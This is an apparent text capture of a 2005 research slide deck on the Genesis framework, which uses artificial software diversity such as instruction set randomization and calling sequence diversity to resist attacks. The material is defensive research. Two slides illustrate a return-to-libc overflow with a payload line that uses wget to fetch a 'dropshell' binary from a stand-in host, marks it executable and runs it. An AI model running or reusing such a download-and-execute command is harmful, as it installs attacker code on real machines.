Download presentation
Presentation is loading. Please wait.
Published byJulian Hensley Modified over 9 years ago
1
G ENESIS : A Framework For Achieving Component Diversity John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong University of Virginia Chenxi Wang Carnegie Mellon University
2
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting2 Project Overview Existing practice: Monoculture Technical objectives: Exploit artificial diversity to break existing software monoculture Technical approach: Artificial diversity at compile, link, load, and execution times Combinations selectable with toolkit
3
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting3 Major risks and planned mitigation: Susceptibility to new class of attacks Deployment issues Ad hoc evaluation Quantitative metrics: Fraction of variants that remain susceptible to attack after transformation Expected major achievements: Significant reduction in susceptibility Task milestones (schedule 12/31/05): Complete diversity toolkit Evaluate complete spectrum of diversity techniques Project Overview
4
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting4 Genesis Diversity Toolkit
5
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting5 Genesis Diversity Generator
6
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting6
7
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting7 Strong ISR using AES and IT Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanovi, ACM Transactions on Information System Security. 8(1), pp. 3-40. Current implementations of ISR execute injected code Random instruction sequences are executed Rely on probabilistic arguments that the random sequences will crash harmlessly Not realistic for critical embedded systems Recovery of application is difficult/impossible Vulnerable to attack Where’s the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005. Overhead issues (both space and time)
8
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting8 Strong ISR using AES and IT
9
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting9 Strong ISR using AES and IT
10
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting10 CSD: Calling sequence diversity Compile-time/runtime technique to create a software population with many different calling sequences Effective defense against “return-to-libc” attacks (also known as arc injection, Pincus and Baker, IEEE Security and Privacy, 2(4), pp. 20-27) Return-to-libc does not require injecting code into the application ISR is not an effective defense against return-to-libc type attacks
11
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting11 Return-to-libc attack void bar(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } … arg2 arg1 return addr Saved ebp buffer Runtime Stack … arg2 Bad arg system Saved ebp buffer Runtime Stack Buffer Overflow wget: http://www.example.com/dropshell ;http://www.example.com/dropshell chmod +x dropshell ;./dropshell
12
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting12 void bar() { … key=Keygen(key, &bar, &foo); foo(arg1, arg2); key=Keygen(key, &foo, &bar); … key=Keygen(key, &bar, &baz); baz(arg); key=Keygen(key, &baz, &bar); … } void foo(int a1, int a2) { Keycheck(key); … Keycheck(key); } CSD: Calling sequence diversity
13
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting13 CSD: Calling sequence diversity Calls to Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix) At runtime: Strata generates a key for each function (stored in protected region) Replaces calls with inline code to generate proper key or check that the key has the proper value
14
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting14 Return-to-libc attack void bad(int arg1, int arg2) { char buffer[100]; … scanf(“%s”, buffer) …. } … arg2 arg1 return addr Saved ebp buffer Runtime Stack … arg2 Bad arg system Saved ebp buffer Runtime Stack Buffer Overflow wget: http://www.example.com/dropshell ;http://www.example.com/dropshell chmod +x dropshell ;./dropshell
15
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting15 Genesis Diversity Toolkit
16
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting16 Toolkit Execution Environment
17
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting17
18
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting18 Performance
19
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting19 Progress Towards Metric Diversity toolkit facilitates: Creation of large number of variants Operating, attacking & monitoring variants Large numbers of variants of Apache created and tested, success rate very high Disclaimers: Only one application Synthetic but realistic vulnerabilities No statistical significance
20
University of Virginia www.cs.virginia.edu/genesisDARPA SRS July 2005 PI Meeting20 Impediments To Success Possibly unacceptable execution performance degradation Unknown security performance against other types of vulnerabilities Need to investigate the spectrum of diversity defense techniques Cost of deployment and maintenance of the variants might be high
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.